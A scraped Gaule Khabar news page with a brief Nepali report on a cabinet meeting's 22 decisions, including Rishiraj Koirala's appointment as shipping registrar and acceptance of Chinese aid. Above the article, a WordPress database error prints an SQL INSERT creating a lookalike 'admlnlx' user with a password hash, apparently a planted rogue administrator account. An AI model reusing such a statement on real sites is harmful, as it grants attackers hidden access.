WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bd2ZX9PuLskiQGOipaSsyRBxLW5w1J0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 19:06:07', '', 'admlnlx', 'admlnlx')

सरकारले गरेका २२ निर्णय यस्ता छन् – Gaule Khabar

सरकारले गरेका २२ निर्णय यस्ता छन्

सरकारले गरेका २२ निर्णय यस्ता छन्

गाउँले न्यूज, १४ चैत्र, काठमाडौं । सरकारले पानीजहाज कार्यालयको रजिष्टारमा ऋषिराज कोइरालालाई नियुक्त गर्ने निर्णय गरेको छ । चैत ७ र ११ गते बसेको मन्त्रिपरिषद बैठकले सो निर्णय गरेको हो ।

बैठकले चीन अन्तर्राष्ट्रिय सहयोग नियोगबाट नेपालको उत्तरी क्षेत्रमा बसोबास गर्ने जनताको जिवकोपार्जनमा सहयोग गर्नका लागि प्राप्त हुने सहायतालाई स्वीकार गर्ने निर्णय समेत गरेको छ । बैठकले अन्य २२ निर्णय समेत गरेको सरकारका प्रवक्ता एवम् सञ्चार तथा सुचना प्रविधि मन्त्री गोकुल बास्कोटाद्वारा जारी विज्ञप्तिमा जनाइएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका